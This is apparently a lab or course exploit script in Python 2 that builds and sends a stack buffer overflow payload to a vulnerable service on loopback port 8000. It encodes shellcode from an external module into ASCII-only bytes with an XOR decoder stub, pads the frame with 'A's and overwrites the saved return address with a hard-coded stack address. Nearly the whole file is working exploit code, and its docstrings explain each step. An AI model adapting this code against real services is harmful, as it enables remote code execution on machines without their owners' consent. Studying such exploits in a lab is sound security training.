- #!/usr/bin/python
- import functools, os, socket, traceback, assemble, struct
- import q2
HOST = '127.0.0.1'   # lab target; the script only ever talks to loopback
SERVER_PORT = 8000   # port the vulnerable service listens on, per this script
LOCAL_PORT = 1337    # not referenced anywhere in this file -- presumably consumed by q2's shellcode (bind port?); TODO confirm
ASCII_MAX = 0x7f     # highest byte value the payload may contain; encode()/get_decoder() keep every emitted byte at or below it
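def warn_invalid_ascii(selector=None):
    """Decorator: report non-ASCII bytes in a function's return value.

    The wrapped function runs normally and its return value is passed
    through untouched; the decorator only prints.  ``selector`` picks the
    part of the return value to inspect (default: the whole value) and
    must yield single-character strings, because each one goes through
    ``ord``.

    For every offending character one line ``"<code> at position <i>"`` is
    printed (positions are 1-based), then a single ``WARNING`` line naming
    the function and dumping the call stack, so the stage that broke the
    ASCII constraint can be located.

    Args:
        selector: optional callable mapping the return value to the
            iterable of characters to check.
    """
    selector = selector or (lambda x: x)

    def decorator(func):
        @functools.wraps(func)
        def result(*args, **kwargs):
            ret = func(*args, **kwargs)
            # Walk the selected characters exactly once.  The original made
            # two passes (one printing positions, one for the WARNING), so a
            # selector returning an iterator was exhausted by the first pass
            # and the WARNING never fired.
            offenders = [(pos, ord(c))
                         for pos, c in enumerate(selector(ret), 1)
                         if ord(c) > ASCII_MAX]
            for pos, code in offenders:
                print(str(code) + " at position " + str(pos))
            if offenders:
                print('WARNING: Non ASCII chars in return value from %s at\n%s'
                      % (func.__name__, ''.join(traceback.format_stack()[:-1])))
            return ret
        return result
    return decorator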
def get_raw_shellcode():
    """Return the unencoded x86 shellcode provided by the ``q2`` module.

    Thin indirection so the encoder pipeline has a single place to swap the
    payload source.  The returned bytes are presumably not ASCII-clean;
    that is what ``encode`` exists for.
    """
    raw = q2.get_shellcode()
    return raw
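@warn_invalid_ascii(lambda ret: ret[0])
def encode(data):
    """Fold every byte above 0x7f into the ASCII range.

    Each byte > 0x7f is replaced by ``byte ^ 0xff``, which maps 0x80..0xff
    onto 0x00..0x7f; bytes already <= 0x7f are copied unchanged, so the
    output has the same length as ``data``.

    The decorator's selector was ``lambda (x,y): x`` -- tuple-parameter
    unpacking, which Python 3 removed (PEP 3113) and which therefore fails
    to compile there.  ``ret[0]`` is the same selection in both versions.

    Args:
        data: raw shellcode as a Python 2 ``str`` (each element must be a
            single character, since ``ord`` is applied to it).

    Returns:
        ``(encoded, indices)``: the ASCII-only string and, in ascending
        order, the offsets that were flipped.  ``get_decoder`` emits one
        ``XOR byte ptr [EAX+i], BL`` (BL = 0xff) per offset, which restores
        the original byte at run time.
    """
    encoded = list(data)
    flipped = []
    for offset, ch in enumerate(encoded):
        value = ord(ch)
        if value > 0x7f:
            flipped.append(offset)
            encoded[offset] = chr(value ^ 0xff)
    return "".join(encoded), flipped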
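@warn_invalid_ascii()
def get_decoder(indices):
    """Build the ASCII-only x86 stub that undoes ``encode`` in place.

    Expects EAX to point at the first byte of the encoded shellcode when
    the stub runs (``get_shellcode`` arranges that).  The stub does:

    1. ``PUSH 0; POP EBX; DEC EBX`` -- EBX becomes 0xffffffff, so BL is the
       0xff mask.  A ``MOV EBX, 0xffffffff`` would carry 0xff bytes and
       fail the ASCII constraint.
    2. For each flipped offset, ``XOR byte ptr [EAX+disp8], BL`` with
       0 <= disp8 <= 127.  Whenever the next offset is more than 127 bytes
       past the current base, EAX is advanced by 127 first (``ADD EAX, 127``
       = opcode 0x05 + imm32, hand-encoded as ``05 7f 00 00 00``; the
       author's note only says this encoding was "forced", so whatever the
       assembler helper emitted for it was presumably not usable).

    Args:
        indices: offsets, relative to the start of the encoded shellcode,
            of the bytes ``encode`` flipped.  They are sorted here: the
            displacement bookkeeping only moves EAX forward, so an unsorted
            list would produce negative displacements (``[EAX+-5]``) that
            the assembler text cannot express.

    Returns:
        The concatenated machine code as a byte string.

    Note: the stub contains 0x00 bytes (``PUSH 0`` and the ADD immediate).
    They satisfy the <= 0x7f check and survive the length-prefixed socket
    transport used by ``main``, but would truncate a strcpy-style copy --
    keep that in mind if the target's input path changes.
    """
    commands = []
    # BL := 0xff without a MOV immediate.
    commands.append(assemble.assemble_data("PUSH 0 ;POP EBX ;DEC EBX ;"))
    # ADD EAX, 127: hand-encoded so every byte stays <= 0x7f.
    advance_base = '\x05\x7f\x00\x00\x00'
    base = 0
    for offset in sorted(indices):
        # Keep the disp8 in range by sliding the base forward in 127-byte steps.
        while offset - base > 127:
            base += 127
            commands.append(advance_base)
        commands.append(assemble.assemble_data(
            "XOR byte ptr [EAX+" + str(offset - base) + "], BL; "))
    return ''.join(commands)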
@warn_invalid_ascii()
def get_shellcode():
    """Return the self-decoding, ASCII-only shellcode.

    Layout: ``[PUSH ESP; POP EAX; DEC EAX x (len+4)] [decoder] [encoded q2 shellcode]``.

    The leading stub makes EAX point at the encoded bytes.  By the time it
    runs, ``ret`` has already popped the saved return address, so ESP sits
    4 bytes above the end of the overflowed frame; ``get_payload`` right-
    aligns the shellcode in that frame, so the encoded part is its last
    ``len`` bytes -- hence EAX = ESP - len - 4.

    Each ``DEC EAX`` is a single 0x48 ('H') byte and ``PUSH ESP``/``POP EAX``
    are 0x54/0x58, all ASCII.  The run of ``len+4`` DECs is wasteful (the
    author says so) but the author's note records that no ASCII-clean
    ``SUB``-style alternative was found.
    """
    raw = get_raw_shellcode()
    encoded, flipped_offsets = encode(raw)
    decoder = get_decoder(flipped_offsets)
    # EAX := ESP - (len + 4); encoded bytes have the same length as raw ones.
    eax_setup = assemble.assemble_data(
        "PUSH ESP ;POP EAX ;" + " DEC EAX ;" * (len(raw) + 4))
    return eax_setup + decoder + encoded
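@warn_invalid_ascii(lambda x: x[4:-4])
def get_payload():
    """Assemble the complete message sent to the target.

    Layout (sizes in bytes)::

        [4: big-endian length of everything that follows]
        [1040: frame = 'A' padding ... decoder stub ... encoded shellcode]
        [4: little-endian saved return address]

    The shellcode is right-aligned in the frame so the encoded bytes end
    right before the return-address slot; the ``PUSH ESP; POP EAX; DEC EAX``
    stub in ``get_shellcode`` relies on exactly that placement.

    Padding byte 0x41 ('A') is not a NOP: it executes as ``inc ecx``
    (``inc eax`` would be 0x40).  The original comment named the wrong
    register, but the conclusion holds because the stub starts by
    reloading EAX from ESP; the decoder never touches ECX.  Whether the
    q2 shellcode cares about ECX's initial value is not visible here.

    Returns:
        The framed message as a byte string.

    Raises:
        ValueError: if stub plus encoded shellcode exceeds the frame.
            ``rjust`` would otherwise silently return the longer string and
            the return address would no longer land on the saved-EIP slot.

    The decorator checks bytes ``[4:-4]`` -- the frame only -- because the
    length prefix and the return address legitimately contain bytes above
    0x7f.  The original used ``[4:-5]``, which skipped the frame's last byte.
    """
    frame_size = 1040
    shellcode = get_shellcode()
    if len(shellcode) > frame_size:
        raise ValueError("shellcode is %d bytes, frame is only %d"
                         % (len(shellcode), frame_size))
    # Hard-coded stack address: assumes no ASLR and the lab machine's exact
    # stack layout -- TODO confirm against the target.
    return_address = network_order_uint32(0xbfffdddc, False)
    frame = shellcode.rjust(frame_size, '\x41')
    message = frame + return_address
    return network_order_uint32(len(message), True) + message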
def network_order_uint32(value, little):
    """Pack ``value`` as a 4-byte unsigned integer.

    Caution: the flag is named backwards relative to what it selects, and
    both callers depend on the current meaning, so it is left as is:

    * ``little`` truthy -> big-endian (network byte order); used for the
      length prefix.
    * ``little`` falsy  -> little-endian; used for the x86 return address.

    Raises ``struct.error`` if ``value`` does not fit in 32 bits.
    """
    layout = '>L' if little else '<I'
    return struct.pack(layout, value)
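def main():
    """Connect to the lab target and deliver the exploit payload.

    The payload is built first so a framing error surfaces before any
    network activity.  The socket is then connected to HOST:SERVER_PORT
    and the payload sent in full.  ``connect`` now sits inside the
    ``try`` so the socket is closed on every path; the original only
    guarded ``sendall`` and leaked the descriptor on a failed connect.

    Only point this at the intended target: HOST/SERVER_PORT describe the
    loopback lab setup.
    """
    payload = get_payload()
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        conn.connect((HOST, SERVER_PORT))
        conn.sendall(payload)
    finally:
        conn.close()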
# Script entry point: build and send the payload; no arguments are parsed.
if __name__ == "__main__":
    main()